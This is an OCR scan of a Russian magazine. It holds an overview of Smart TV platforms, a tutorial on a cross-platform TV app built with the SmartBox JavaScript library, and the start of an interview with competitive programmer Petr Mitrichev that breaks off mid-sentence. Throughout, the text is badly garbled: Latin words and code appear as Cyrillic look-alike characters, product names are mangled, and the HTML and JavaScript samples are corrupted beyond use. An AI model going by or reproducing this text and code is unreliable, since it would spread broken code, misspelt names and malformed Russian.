Во всех модел^х 1_Ө 5плаг1: ТУ исполвзуетс^ \Л/еһКЈ1, что значителвно сокраидает количе- 
ство «спеи,ифичных» багов. 

1_Ө предоставл^ет дгт разработчиков подробнукз документаи,икз и 50К с әмул^то- 
рами и средои разработки, построеннои на основе ЕсПрзе. У платформы 1_Ө еств еиде 
одна особенноств — приложение необходимо зашифроватв на саите перед выгрузкои 
наустроиство. 

Компани^ 1_Ө ^вл^етс^ учредителем 5плагтТ\/АШапсе — әто проект, созданныи 
в 2012 году совместными усили^ми сТР Ујзјоп (компаниеи, производ^идеи телевизо- 
ры под брендом РҺШрз) в идгтх создани^ унифии,ированнои платформы приложении 
дгт умных телевизоров. 

ОФИиИАЛҺНЫИ САИТ ВОМЕК: аоо.аЈ/Усбуаг 





Достаточно своеобразна^ платформа. Втора^ по об^емам продаж в России, но, 
несмотр^ на әто, разработка дл^ РҺШрз конкретно прокачивает навыки логическо- 
го мышлени^, так как документаии^ неверо^тно скудна^ :). 
Вот что известно про зту платформу: 

• До моделеи 2012 года вместо НТМ1_ необходимо было исполызоватв СЕ-НТМ1_ 
(спеииалвно разработанныи стандарт дл^ телевизоров и мобилвных устроиств 
на основе ХНТМ1_). 

Нет структурированнои документаи,ии, зато еств примеры и немного статеи, 
из которых можно крупи1дами собиратв информаи,икз. 

• Оченв плохои әмул^тор и отсутствие возможности запуститв приложение пол- 
ноиенно в телевизоре. Дл^ тестировани^ приходитс^ открыватв приложение во 
встроенном в устроиство браузере. 

ОФИиИАЛҺНЫИ САИТ ВОМЕК: уоигарроШу.сот 



РАЗРАБОТКА КРОСС-ПЛАТФОРМЕННОГО ПРИЛОЖЕНИЛ 
ПРИ ПОМОШИ ЗМАНТВОХ 

Как ты пон^л, в разработке приложени^ дгт 5плаг1: ТУ оченв много особенностеи. 
Недолго дума^, мы с командои решили создатв библиотеку, основыва^св на опы- 
те кросс-платформеннои разработки дгт умных телевизоров. Вот список того, чем 
наши наработки могутупроститв тебе жизнв: 

возможноств написатвабстрактныи код, основыва^св на АР1 библиотеки, а не каж- 

дого IV или приставки; 

• добавление новои поддерживаемои платформы без изменени^ кода самого при- 
ложени^; 

плагин навигаи,ии, позвол^кзидии переклкзчатвфокус внутри приложени^ безлиш- 
них проблем; 

инпуты и виртуалвна^ мулвти^зычна^ клавиатура; 

плагин дгт исполвзовани^ возможности управлени^ голосом; 

плагин легенды (подсказки по клавишам внизу әкрана); 

• абстрак1ди^ 1_оса151:огаде — хранение данных на конечных устроиствах; 

• абстрак1ди^ над функ1ди^ми плеера; 

• удобна^ замена сопзо1е.1од в телевизоре. ^^^^^^ 



дооавитв новукз платсрорму в ^тагшох не составит труда, в репозитории 
ты сможешв наити документаиикз, как зто сделатв. Код библиотеки мы выло- 
жили на ӨЈШир. 



На данныи момент библиотека позвол^ет запускатв приложение на трех мажорных 
платформах: 

• Заплзипд; 

• 1-6; 

• РҺШрз. 

Кроме того, ЗплагЈһох без проблем запускаетс^ и на приставке 5ТВ Мад 200/250. 




(3* 5һо« соп!еп1 



Дизаин приложенил 



1-ЕТ'З СО! 

Но доволвно теории, даваи попробуем написатв кросс-платформенное приложе- 
ние дгт ТВ, исполвзу^ ЗплагЈһох. Наше приложение будет иметв менкз, список видео 
из внешнего фаила, демонстраи,икз навигаиии и примеры полеи ввода с виртуалв- 
нои клавиатурои. Приложение будет в трендовом Ғ1ат-дизаине. 
Накидаем НТМ1_дгт менкз: 

<с1п.у с1а55="тепи"> 

<сЈЈу с !а55="1о§о"х/с1Ју> 

<и! с1а55="тепи- Ј1:ет5" с1а"са-пау_1:уре="үһох" с!а1:а-пау_1оор= "1:гие"> 

<Н сЈа1:а-согтсеп1: ='уЈс1ео' с1а55="теп и-Ј1:ет тепи-Ј1 :ет_§гее п пау-Ј1:ет"><- 
У Ј (Јео5< /1Ј> 

<Н с!а"са-соггсеггс = ' Јпри1: ' с1а55="тепи-И:ет тепи-Ј1:ет_ Ыие пау-Ј1:ет"><- 
1при1:5</1Ј> 



<Н с!ат.а-сопт.е п1:= ' пауЈ§ат.Јоп ' с1а55= "тепи-Јт.ет тепи-јт.ет_гес1 пау-Јт.ет"><- 
МауЈ§ат.Јоп< /П> 

</и!> 
</сИу>^ 

Самое важное, что стоит тут отметитв, — атрибуты а!ат.а-* и класс пау-_т.ет. Атри- 
бут а!ат.а-пау_т.уре="уоох" служитдл^ оптимизаиии навигаиии, при его исполвзо- 
вании фокус начинает перемешатыз^ от одного зЈЫЈпд-әлемента к другому. Атрибут 
а , ат.а-пау_1оор="т.гие" позвол^ет заиикливатв навигаиикз в рамках своего әлемен- 
та. Все видимые әлементы с классом пау-_т.еш могут получитв на себ^ фокус и поз- 
же ини1диироватв событи^ (1осиз, сПск, е1с). Атрибут с1ат.а-сопт.епт. будем исполвзо- 
ватв дл^ отображени^ сиен приложени^. 




С|дена со списком видео 



Добавим НТМ_дл^ сиен. 



<61у с!а5 5 ="5сепе5-ыгаррег"> 

< ! — Список видео будем генерироват_ из внешнего фаила --> 
<сј ју с!а55="5сепе 5сепе_уЈс1ео Ј5-5сепе-у Јс1ео" с1ат.а-пау_т.ур е="у1зох" 4- 
„ат.а - пау_1оор= "т.гие"х/с1Ју> 



< ! — Сиена длл демонстраиии инпутов --> 
<сЈЈ у с! а55="5сепе 5сепе_Јприт. Ј5-5сепе-Јприт."> 
<сЈЈу с1а55="Јприт.-ехатр1е"> 
^<һ2>5т.апс1аг1: Јпр ит.</Һ2> 
<јприт. с1а55="Јприт.-Јт.ет Ј5-Јприт.-1 пау-Јт.ет"/> 
<с! Ју с1а55="Јприт.-уа1"> 

1прит. уа!ие: <5рап с!а5 5=" Ј5-Јприт.-1-уа1"х/ 5рап> 



</СИУ> 

</с1ју> 

<с1ју с1а55="Јп рит.-ехатр1е"> 

<һ2> 1прит. мгЕҺ етаП кеуроагск/һ2> 

<јприт. с1а5 5="Јприт.-Ј1:ет Ј5-Јприт.-2 пау-Јт.ет"/> 
</сЈју> 

<с!Ју с1а55="Јприт.-ехатр1е"> 

<һ2>1пр ит. ыИ:һ пит кеуһоагс! апс! тах1тит 4 5Ј§П5</Һ 2> 
^<1прит. с1а5 5="јприт.-јт.ет Ј5-Јприт.-3 пау-Јт.ет"/> 

</(ЈЈУ> 
</СЈЈУ> 

<! — Смена длл д емонстраиии навигаиии --> 
<с!Ју с!а55="5сепе Ј5-5сепе-пауЈ§ат.Јоп"> 
<и! с1а55="пауЈ§ат.Јоп-Јт.еш5"> 

<1ј с1а5 5=" пауЈ§ат.Јоп-Јт.ет пау-Јт.ет">К/1Ј> 

//... 

<1ј с1а5 5 ="пауЈ§ат.Јоп-Јт.ет пау-Јт.ет">8</1Ј> 

</ и!> 

<р с 1а5 5= "пауЈ§ат.Јоп-Јп-Ғо"></р> 
</с1ју> 
</сЈЈу> 

Теперв НТМ1_ нашего приложени^ готов, приступим к написаникз главного Ј5-фаила 
приложени^ арр.јз. После инии,иализаи,ии самого ЗплагШох происходит старт прило- 
жени^. 

// 5В() - главнал функјдил 5шагт.рох Ј вызываетсл после инии,иализаи,ии всех 
// плагинов и запуска платформы 
5В( -Ғипст.Јоп( ){ 
Арр . 1пгс1аИ2е ( ) ; 




Кетоуе зүтбо! Сотр1е1е [0~9) Митјпри! _Ј >при1 !■ И(1е һеуһоагс! 



С|дена с инпутами и виртуалвнои клавиатурои 

Во врем^ иниииализаиии покажем легенду, запустим навигаи,ик) и установим основ- 
ные обработчики событии дл^ клавиш пулвта и плеера. 

Арр . _п_ "с_а1__е = т"ипст_оп () { 
1:һ_5 .$ ыгар = $( ' .ыгар' ) ; 
// Показываем легенду 
$$1е§епс1 . 5һоы( ) ; 
тһ_5 . 5 е"ЕЕуе 1тЕ5( ) ; 

// Запускаем навигаиик) (в фокусе будет первыи 
// видимыи әлемент с классом пау-Јтет) 
$$пау.оп(); 

}; 

Арр . 5е"ЕЕуе1 гЕ5 = т"ипс1:_оп () { 
уаг 5е1-Ғ = тһ_5; 

// Отображаем сиену при клике на әлементе менк) 
$( ' .тепи ' ) .оп ( ' сПск' , ' .тепи-ј-сет' , т"ипс1:_оп(е ){ 



// Именно здес_ и нужен атрибут сЈата-соптепт: 

уаг 5сепе = е.сиггептТа г§ет.§е1:А1:1:г_-и1:е( ' (Ја^а-согусегус ' ); 

5е1-Ғ. 5һоыСопт:еп1:(5сепе) ; 

}); 

$(с1оситепт:.һос1у) .оп({ 

// Скрываем/отображаем интерфеис при клике по синеи кнопке пулвта или 
// клавише Р на клавиатуре 
' пау_кеу : Ыие ' : -ҒипстЛопО { 
5е1јЧ±о§§1е\/1е1л/( ) ; 

һ 

II гето_е еуепт:5 
' пау_кеу : 5тор ' : т"ипст:_оп () { 
Р1ауег.5"сор(Х^ 

һ 

' пау_кеу : раи^е ' : т"ипст_оп () { 
Р1ауег.то§§1еРаи5е(Х^ 

һ 

' пау_кеу :ехјт: ' : т"ипст_оп( ) { 
5В.ехгс(); 

1 

}); 

}; 

Метод зһомСогтсеп-с будет скрыватв текуидукз си,ену и отображатв новукз. Кажда^ си,ена 
будет иметв три метода — _п_т_ дгт разовои ини1диализаи,ии и 5һои//һ1с1е дгт управ- 
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Реализаии^ методов отображени^ будет одинаковои во всех сиенах: 



5 һ о ы: ^ипс^сјоп () { 
ј-Ғ ( !_јпј-сес!) { 

// Отложеннал инии,иализаи,ил сиены 
•сҺјб . јпј-с ( ) ; 
_1П11:ес1 = 1:гие; 

} 

тһјз .$е1. 5 һоы ( ) ; 



Һ1с1е: -Ғипс1:10п ( ) { 
1:ҺЈ5.$е1.Һ Јс1е() ; 

} 

Ну а теперв приступаем к реализаи,ии си,ен, п буду приводитв код без методов зһо\л// 
ҺЈсЈе. Но дгт начала вынесем список видео в отделвныи фаил: 

Ы1ПС10Ы.Арр. Ү1С1е05 = [ 



{ 





1:гс1е 


: 'Е1ерһап1:5 Огеаш^ 




иг! : 


' 1тс1:р5 : //агсһ1уе.ог§/с1оып1оас1/Е1ерһап1:50геат/ес1 1024 512кһ.тр4' , 




түре: 


'уосГ 


һ 






ггс1е 


: 'КесЈһиИ', 




иг1 : 


' һттр: //Иче. 1рһопе. гесШиП .с1е.ес1§е5и11:е. пет/меЫ^НО.тЗив ' , 




■сүре: 


'Һ15' 


>, 


//. 


• • 




1; 



Можно приступатв к реализаи,ии си,ены со списком видео. 

ЈПЈ1: : ^ипстЈоп () { 

// В тһЈ5.$е! сохранлем злемент сиены 
тһЈ5.$е! = $( ' . Ј5-5сепе-уЈс1ео ' ) ; 

// Устанавливаем обработчик длл клика по з-лементу списка 
тһЈ5 .$е!.оп( ' сПск' , ' . уЈсЈео-Јтеш ' , ^Ыв .лпЈтетСПск) ; 
1:һ15 . гепс1ег11:ет5(Арр.Ү1с1ео5) ; 



// Генераиил списка видео 
гепс!ег1"сет 5 : ^ипстЈоп (Ј гет5) { 
уаг 1гст1 = ' ' , 

ј-сетНтт! = _.тетр1а1:е( ' «јј у с1а55="уЈс!ео-Ј1: ет паү-11:ет''>{{1:1-с1е}}</с11М>^)^ 
// соп5о!е. ^о^Ј^сет^Ј Ј1:етН1:т1.1:о51:гЈп%()) 
-Ғог (уаг 1=0, 1еп = Јтет5 . 1еп§тһ ; ј<1еп; ј++ ) { 



Һт.ш1 += 1т.етНт.т1(:1т.ет5[:1] ) ; 

т.һЈ5.$е! 
.етрт.у() 
.Һт.т1(һт.т1); 



// Обработчик клика по злементу 
оп1т.етС1Јск: -Ғипст_Јоп (е) { 

уаг 1пс1ех=$(е. сиггепт.Таг§ет.) Лпс1ех(); 



// ыјпсјоы. Р1ауег - плагин 5тагт.рох. Видео запускаетсл передачеи обвекта 
// с 1)К1. и т.уре в метод р!ау 
Р1ауег. р1ау(Арр. У1с1ео5[1пс1ех] ) ; 

һ 

Сиена со списком готова, можно запускатв видео и добавл^тв новые әлементы. Соз- 
дадим возможноств исполвзоватв инпуты в ЗплаМ: ТУ, в методе ЈпК си,ены с пол^ми 
ввода впишем код: 

јпјт.: -Ғипс^сЈоп () { 

т.һЈ5.$е1 = $( ' . Ј5-5сепе-Јприт. ' ) ; 

уаг $уа!и еТехт. = Т.ҺЈ5 . $е! . т1псј ( ' . Ј5-Јприт.-1-уа1 ' ); 

тјҺјз . $е! . -Ппс! ( ' . Ј5-Јприт.-1 ' ) 

// т.ехт._сһап§е - событие плагина 5В1прит.Ј вызываетсл при изменении 
// текста инпута 
.оп( 'т.ехт._сһап§е' Ј-Ғипст.Јоп () { 
$уа1иеТехт. . Һт.т1(т.һ15 . уа1ие) ; 

// Плагин 5В1прит. - обычныи плагин јСшегу 
.5В1пр ит.({ 
кеуроаг сЈ: { 

// Длл первого инпута клавиатура будет русскал с возможностыо 
// отображенил ииф р 
т.уре: '-Ғи11т.ехт._ги_пит5 ' 

} 

}); 

Т.ҺЈ5 .$е1.-гппс1( ' . Ј5-Јприт.-2 ' ) .5В1прит.({ 
кеуһоаг сЈ: { 

// Спеииалвныи 1ауоит. клавиатуры длл ввода з-лектроннои почты 
т.уре: 'етаИ' 

} 

}); 

тјҺјб . $е! . т1пс1( ' . Ј5-Јприт.-3' ) .5В1прит.({ 
кеуһоаг сЈ: { 

// 1ауоит. толһко с девлтыо иифрами 
т.уре: 'пит' 



II Максималвное количество символов в инпуте 



шах: 4 




С|дена с примером навигаиии 

Теперв можно вводитв данные в пол^ ввода, отображатв и скры- 
ватв клавиатуру. Остаетс^ добавитв код дгт си,ены с приме- 
ром навигаи,ии. На әлементе с классом пау-гсеш вызываетс^ 
событие пау_-Ғоси5 при попадании фокуса на него и пау_Ыиг 
при потере фокуса. Добавим обработчики дл^ зтих событии 
в С1дене. 



1 п ј т.: -Ғипс1:Јоп () { 



уаг $Јп -Ғо; 



т.һЈ5.$е! = $( ' . Ј5-5сепе-пауЈ§ат.Јоп ' ); 



$Ј гтҒо = Т.ҺЈ5 . $е! . -ПпсЈ ( ' . пауЈ§ат.Јоп-Јп-Ғо ' ) ; 
т.һЈ5.$е! 

. -ПпсЈ ( ' . пауЈ§ат.Јоп-Јт.ет' ) 
•оп({ 

// Отображаем информаиик) при попадании фокуса 
на злемент 

' пау_-Ғоси5 ' : -Ғипст.Јоп () { 
$1п-Ғо . Һт.т1 ( ' 1т.е т мј-сһ т.ехт. "' + тјҺјб . ЈппегНТМ!. + 
'" -Ғоси^есГ); 

һ 

II Чистим строку информаиии при потере фокуса 
'пау_Ыиг': -Ғипс1:Јоп () { 



ир 

ирс1о\\ т п ф 
тоүе 

питһег [0^9] 
сп1:ег (Тј- 1 
ге* 

Возможные 
подсказки 
плагина легенды 



$_п-Ғо.һ*т1(' '); 

} 

}); 

} 

Основнои код дгт С1дөн готов, приложение функи,ионирует, 
остаетс^ толвко добавитв подсказки дгт клавиш в плагине ле- 
генды. Все возможные кнопки в легенде представлены на ри- 
сунке справа, а полвзоватвс^ клавишами несложно: 

$ ( ' .тегш-Ј-Ееғп' ) . оп ( {_ 

' пау_~Ғоси5 ' : ^ипстјоп () { 
// Отображаем в легенде Еггсег 
$$1е§епс1 . кеуз . еггсег ( '5һоы соггсеггс') 

һ 

'пау_Ыиг': -ҒипстЈоп () { 
// Скрываем Еггсег из легенды 
$$1е§епс1 . кеуз . еггсег( ' ' ) 

— 1 
}); 

Готовыи код приложени^ ты можешв наити тут . Также можешв посмотретв на при- 
ложение в деиствии . В браузере навигаии^ осушествл^етс^ с помоидыо мыши или 
стрелок клавиатуры, а кнопки пулвта ВЕО, ҮЕ1_1_0\/\/, ӨВЕЕЫ, ВШЕ замен^кггс^ на кла- 
виши А, В, С, 0. 

ЗАКЛК)ЧЕНИЕ 

Теперв ты подготовлен к встрече со ЗплаМ: ТУ в боевых услови^х разработки. Если 
хочешв поучаствоватв в разработке ЗплагЈоох — мы всегда рады ри11 гедиез1:'ам 
на ӨЈШио. А если возникли вопросы по разработке под ЗплаМ: ТУ — пиши мне! _К_ 



НАДТЕМОИ НОМЕРА РАБОТАЛИ 




/ а_ % (Һ -Гк 



Интервыо 




Мһтс 



тричев 



Легенда спортивного 
программировани^ 



Мастөр бол 
а клавиатурах 



1 



Говорлт, когда он полвилсл на свөт, к нөму запгтнул сам 
Доналвд Кнут Говорлт, когда өго пригласили работатв 
в Соод1ө, он за 15 минут пөрөписал весв поисковыи алго- 
ритм 16 раз. Говорлт, он сулыбкои слөдитза прогрөссом 
квантовых вычислөнии, так как при видө его числа от стра- 
ха факторизунзтсл сами. Но мы точно знаем одно: Петр — 
настолш,ии бог спортивного программированил. 



Призер много- 
численныхчем- 
пионатов, Петр 
дважды побеждал 
в ТорСос!ег и дваж- 
ды занимал второе 
местовАСМ 1СРС. 



Ф А К Т Ы 



В свободное вре- 
м^ Петр ведет блог 
о регул^рных кон- 
тестах «Алгорит- 
мические задачи 
дл^ чаиников»: рејг- 
тЈјпсһеу.ЫодзроЈ.ги . 



Сеичас Митричев 
работает в Соод1е, 
где занимаетс^ 
качеством поиска. 
Также Петр помога- 
ет в подготовке со- 
ревновании Соод1е 
Сос!е Јат. 



Многие считакот, что спортивные программисты — зто крутые реблта, на- 
стол^дие гики, разбирако^диесл в алгоритмах и решакзидие сложные задачи. 
Но также говорлт, что им оченв сложно потом где-то себл применитв. Әто так? 

Спортивное программирование и вообиде то, чем мы занимаемс^ на олимпиадах, — 
зто деиствителвно не та веидв, которои можно зарабатыватв на жизнв. С другои сто- 
роны, программирование, как и лкзбои другои спорт, — әто развитие дл^ человека. 
Благодар^ ему человек становитс^ умнее, лучше программирует, лучше иидет в про- 
граммах ошибки. После такои подготовки легче работатв и заниматвс^ другими ин- 
тересными веидами. 

Алгоритмы определенно применимы в практике программиста, хот^ на рабо- 
те 9\ встречалс^ и с алгоритмами, которые сложнее тех, что бывакзт на олимпиадах. 
Но на олимпиадах мы ограничены алгоритмами, которые, грубо говор^, можно напи- 
сатв за полчаса-час. Поәтому там в задачах исполвзуетс^ вполне конкретное, огра- 
ниченное множество алгоритмов. В реалвнои жизни все просто более... обширно. 



На каком лзыке ты писал решенил длл задач? 

На Јауа. В школе п писал на Разса1, потому что болвше тогда ничего не знал. А потом, 
когда нужно было выбратв, на что переити, Јауа оказалс^ ближе к Разсак 

В услови^х соревновани^ нужно написатв программу за 20-30 минут, и она долж- 
на сразу работатв правилвно. Поәтому оченв важно, чтобы ^зык не позвол^л сажатв 



баги. С++, которыи исполызует болвшинство, отличаетс^ тем, что на нем доволвно 
легко написатв неправилвнукз программу. Можно случаино забытв что-то, присвоитв 
неправилвныи тип переменнои, но все зто будет как-то компилироватыз^ и как-то 
работатв. Скорее всего, не так, какты ожидаешв. 

В Јауа, если допуститв ошибку или опечатку, программа, скорее всего, просто 
не скомпилируетс^. Здесв все строже, как и в случае с Разса1. Мне зто показалосв 
более подход^шим. Обратна^ сторона медали — программы на Јауа часто работакзт 
раза в полтора медленнее, чем программы на С++. Иногда именно зтих полутора раз 
не хватает, чтобы программа укладываласв в условие задачи. 

Лзык программированил каждыи может выбиратв сам, да? 

Еств ограничени^. Конечно, бывакзт разные соревновани^... возвмем Өоод1е Сос!е 
Јат, к примеру. Когда мы решали, как лучше его сделатв, мы придумали, что можно 
работатв на лкзбом ^зыке. Ты скачиваешв на компыотер входнои фаил с данными за- 
дачи, запускаешв на компыотере свокз программу, а потом посылаешв на сервер ре- 
зулвтат. Какои у теб^ на компыотере стоит компил^тор/интерпретатор, тем и можно 
полызоватыз^. Минус даннои системы в том, что компыотеры у лкздеи разные. У ко- 
го-то компыотер в дес^тв раз моиднее, чем удругого. Поәтому приходитс^ создаватв 
задачи, где неправилвное решение от правилвного по скорости отличаетс^ хот^ бы 
в сто раз. Чтобы если у человека компыотер в дес^тв раз медленнее, правилвное 
решение у него работало, или на компыотере в дес^тв раз быстрее неправилвное 
решение все равно не работало. Поәтому нужны задачи с болвшим зазором между 
правилвным и неправилвным решением по скорости работы. 

На ТорСос!ег, СосЈеТогсез и АСМ исполызуетс^ стандартна^ система, где ты посы- 
лаешв исходныи код и они запускакзт его у себ^ на сервере. Здесв ты ограничен тем, 
что у них на сервере еств. Болыјјинство участников, 70-80% исполызукзт С++, еиде 
20% исполвзукзт Јауа, осталвных^зыков оченв мало. Әто, мне кажетс^, такои и,икл — 
новые лкзди, которые приход^т на соревновани^, начинакзт обидатыз^ с другими, бо- 
лее старыми участниками, те учат новичков тому, что умекзт сами. В итоге новые лкзди 
тоже начинакзт полызоватыз^ теми же ^зыками. Так что әти два ^зыка не то чтобы как- 
то особенно подходили дп^ соревновании, просто так сложилосв исторически. 

То еств в жизни все зто применимо? Ведв навернлка сложно наити работу, 
на которои зти знанил пригодилисв бы. Да, можно поити в Соод1е или Лндекс, 
но приити в какои-нибудв банкуже сложнее? 

Мне кажетс^, әто оченв полезна^ частв скилла, та частв, что отвечает за умение на- 
писатв про-грамму с первого раза, без ошибок, или наити ошибку в программе то- 
вариида. Сам ^ в банке не работал, но мне кажетс^, что такие навыки пригодилисв бы 
и там. Хот^, конечно, сами алгоритмы деиствителвно примен^кзтс^ не в лкзбои рабо- 
те. Но лично мне әтот бәкграунд оченв помогает. 

У тебл, наверное, была какал-то особал историл, какты попал в Соод1е? 

Да нет никакои истории, все было так же, как у других. Сеичас п занимакзсв поиском 
(обидеи его частвкз, котора^ не зависит от страны и ^зыка), но, к сожаленикз, не могу 
ничего об әтом рассказыватв, так как әто оченв конфиденииалвна^ частв. 

СПОРТИВНОЕ ПРОГРДММИРОВДНИЕ- «ЗА» И «ПРОТИВ» 



Даваи л попробук) задатв тебе глупыи вопрос :). Почему нужно заниматвсл 
спортивным программированием, какты считаешв? 

Здесв все оченв просто и похоже на лкзбои другои спорт. Нужно заниматыз^ әтим, 
если тебе зто нравитс^, если ты получаешв от зтого удоволвствие. Әто не должно 
бытв самоиелһК). Нужно восприниматв спортивное программирование как способ 
хорошо провести врем^, познакомитвс^ с интересными лкздвми и так далее. 

А есл и попытатвсл придуматв причину , почему не стоит тратитв времл на спор- 
тивное программирование? 

Думакз, нужно отдаватв себе отчет в том, что зто — не главное в жизни. Иметв какие-то 
другие и,ели, помимо зтои. Если что-то начинает заниматв абсолкзтно вскз твокз жизнв, 
наверное, зто уже повод задуматвс^ о том, чтобы как минимум сделатв перерыв. 

Но что говорит практика, возможно ли, например, построитв карверу вокруг 
спортивного программированил? 

В России еств несколвко человек, которые профессионалвно занимакзтс^ подготов- 
кои новых спортивных программистов, — тренеры. Андреи Станкевич, Миша Мирза- 
^нов и другие. Все они преподактг в университетах, но сушественнукз частв своего 
рабочего времени трат^т именно на подготовку студентов и школвников к соревно- 
вани^м по программированикз. Дл^ них зто деиствителвно работа и, можно сказатв, 
карвера. 

Ты сам не задумывалсл о подобном? Нигде не участвуешв в жк>ри или как со- 
ставителв задач? 

^ пробовал учитв школвников в 57-и школе, где сам училс^. Пробовал готовитв ко- 
манды к олимпиадам. Сеичас в Москве әта тема оченв активна — еств команды у МГУ, 
Физтеха, Высшеи школы әкономики. Но с преподаванием у мен^ как-то не сложилосв. 

Что до контестов, прежде всего п помогакз делатв задачи дгт Өоод1е Сос!е Јат, 
дгт нашего соревновани^. Плкзс помогакз с полуфиналом АСМ, которыи проходит 
в Санкт-Петербурге. Әто отбор среди россииских команд и команд бывшего СССР 
на финал. 

Можно ли заработатв на соревнованилх? Ведв за победу дакзт денежные призы. 

Слишком маленвка^ веро^тноств. Один приз на дес^тв тыс^ч участников?.. ^ не на- 
звал бы әто заработком. Рассчитыватв на әто как на основнои источник дохода... мне 
кажетс^, без шансов. 

Но, как^ уже сказал, еств много разныхсоревновании. Тотже ТорСос!ег проводит 
соревновани^ по разработке программ. Допустим, нужно разработатв компонент 
дгт программы, которыи делает то-то. По итогам оиенивакзт, у кого что получилосв, 
и лучшее исполызуктг — әто решение покупает клиент и платит денвги тому, кто әто 
решение сделал. Лкзди, которые занимакзтс^ әтим Ти11 Ипле, как п понимакз, зараба- 
тывакзт доволвно прилично. 

КОНТЕСТЫ СЕГОДНЛ 

Расскажи подробнее, какие сеичас бывакзт соревнованил, как все зто проис- 
ходит? 



На сегоднт суидествует два вида контестов. Еств еженеделыные, регул^рные сорев- 
новани^. Их провод^т два основныхсаита — ТорСос!ег и Сос!еТогсе5. Каждыи контест 
занимает полтора-два часа. Там участникам даетс^ несколвко задач, которые нужно 
решитв и послатв программу на сервер. Организаторы провер^кзт, работает ли про- 
грамма. 

Далыие начинакжт тонкости, например, в обоихзтихсоревновани^хеиде еств воз- 
можноств искатв ошибки в решени^х других лкздеи и получатв баллы за наиденные. 

ТорСос!ег — самыи старыи и известныи саит с еженеделвными контестами. У них 
следукзшие правила. На решение трехзадач отводитс^ один час п^тнадиатв минут. 

Задани^ обычно дел^тс^ на оченв простые, средние и сложные. Устроители ста- 
ракжт подобратв ихтак, чтобы, скажем, п^тв человек решили все задачи, сто чело- 
век — две, а все осталвные решили хот^ бы одну. Притом дгт каждои задачи важно, 
когда ты ее отправишв, — чем позже, тем менвше ты получишв баллов. Так разде- 
л^кшт те лкзди, что решили одинаковое число задач. Потом баллы суммирукжт. 
Обычна^ задача стоит 250 баллов. Средн^^ 500. Сложна^ 1000. В среднем у лкздеи 
с первых мест получаетс^ по тыс^че с чем-то баллов за соревнование. 

Далыие делакзт перерыв п^тв минут и еше п^тнадиатв минут отводитс^ на поиск 
ошибоку других. Можно открытв решение лкзбого человека, по лкзбои задаче в тво- 
еи «комнате». «Комната» — әто когда лкзди, участвукзидие в соревновании, случаино 
разбивакшт на группы по двадиатв человек. Разбивакзтс^ на «комнаты». Ты можешв 
открытвлкзбое решение лкзбого человека изтвоеи «комнаты». Если решение кажетс^ 
тебе неверным, то можно вбитв входные данные, на которых оно будет неправилв- 
но. И если оно деиствителвно дает неправилвныи ответ, ты получаешв за әто еше 50 
баллов. Әто, конечно, менвше стоимости задачи. Но әто оп^тв же делаетс^ дл^ раз- 
делени^ лкздеи. Основные баллы все-таки начиогткзт за решение задач, а не за по- 
иск ошибок. 

После всего әтого задачи провер^кжт на тестах, которые готовило жкзри. Если 
задача не работает, человек получает 0 баллов. 

Еств еиде второи саит, россиискии, — Сос!еТогсе5. У них правила немного другие, 
но формат приблизителвно тот же — два часа и несколвко задач. Если угодно, такои 
формат можно назватв развлекателвным, в отличие от студенческих олимпиад, кото- 
рые дгттс^ по п^тв часов. 

Но Ө1де еств крупные, ежегодные контесты? 

Да, кроме двух описанных соревновании, что проход^т еженеделвно, еств еше мно- 
жество ежегодных соревновании. Обычно они устроены так: нека^ крупна^ компани^ 
(Өоод1е, ^ндекс, ТорСос!ег, 1ВМ) проводит соревнование, с несколвкими әтапами от- 
бора. Первые әтапы проход^т по интернету. Афиналвныи әтап уже проводитс^ в ка- 
ком-то конкретном месте, куда своз^т всех финалистов. Таких соревновании всего 
штук п^тв-дес^тв, но они длинные, так что все врем^ происходит какое-то из них. 

Все зти соревнованил индивидуалвные? 

Болыјјинство соревновании сеичас индивидуалвные. Командные — әто главным об- 
разом студенческие соревновани^, основное из них — АСМ 1СРС. И другие студен- 
ческие соревновани^ тоже обычно делакгг командными, потому что, грубо говор^, 
там командауже еств. Так легче заинтересоватв лкздеи. Вот ветеранские соревнова- 
ни^ обычно үже личные. 



Почти у всех соревновании еств некие реитинги, самыи известныи у ТорСосЈег. 
Что зто такое? 

У еженеделыных соревновании еств реитинг, как в шахматах, которыи обновл^етс^ 
после каждого соревновани^. Те, кто выступил лучше, получакзт плкзс, кто хуже — 
минус. Если же ты не участвовал вовсе, реитинг не мен^етс^. Система построена 
таким образом, чтобы уравн^тв лкздеи, которые бывакзт часто и редко. Давлени^ 
«нужно участвоватв посто^нно» там нет. Еств много лкздеи, которые гораздо старше 
мен^, они по^вл^кзтс^ оченв редко — раз в два мес^иа, — и все равно у них остаетс^ 
хорошии реитинг, потому что они продолжакзт хорошо решатв задачи. 

В реитинге ТорСосЈег ты сеичас второи? 

Да, на первом месте Гена Короткевич, оченвумныи студентиз Гомел^, сеичасонучит- 
с^ в ИТМО. На Сос!еТогсе5 у мен^ в последнее врем^ резулвтат похуже, сеичас п ше- 
стои или п^тыи. Там тоже Гена на первом месте. 

Наверное, игратв в онлаине и офлаине — зто совсем разные ош,уш,енил и опыт? 

Конечно. Мне кажетс^, оченв важна^ положителвна^ сторона спортивного програм- 
мировани^ заклкзчаетс^ в том, что все соревновани^ заканчивакзтс^ опзКе-раундом, 
куда овезжакзтс^ все лучшие. ^ благодар^ әтому познакомилс^ со многими классны- 
ми лкздвми со всего мира. Вообше, основнои «приз» в таких соревновани^х, как мне 
кажетс^, — зто именно встреча с лкздвми. Проводишв с ними врем^, обидаешыз^, 
узнаешв что-то новое. Оченв забавно, что лкздеи из других стран, которые зачастукз 
плохо говор^т по-англииски, тем не менее оченв легко пониматв, потому как у них 
оченв похожие интересы. 

В таких соревновани^х — с отборами — обычно участвует болвше народу, чем 
в регул^рных. Если человек никогда и нигде не участвовал, еженеделвные соревно- 
вани^ могут статв проблемои. Там такие задачи, что человек может ничего не решитв 
и расстроитвс^. В соревновани^х с отборами обычно все проиде, во вс^ком случае 
на первых әтапах. Их основна^ иде^ заклкзчаетс^ в том, чтобы все получили удоволв- 
ствие. Оп^тв же еств ос^заемыи приз в коние — денежные призы за первые места. 
Плкзс поездка куда-либо, например в офис Өоод1е, тоже вполне себе приз. 

Бываеттакое, что компании потом пытакггсл исполвзоватв вжизни наработки 
из сданных конкурсантами решении? 

Доволвно редко. Основна^ и,елв компании, что провод^т такие соревновани^, — әто 
просто попул^ризаии^ программировани^. Втора^ и,елв — поиск новых сотрудников. 
Но второе даже не столв важно. Обычно компани^ устраивает соревнование имен- 
но затем, чтобы болвше лкздеи заинтересовалосв программированием, и речв даже 
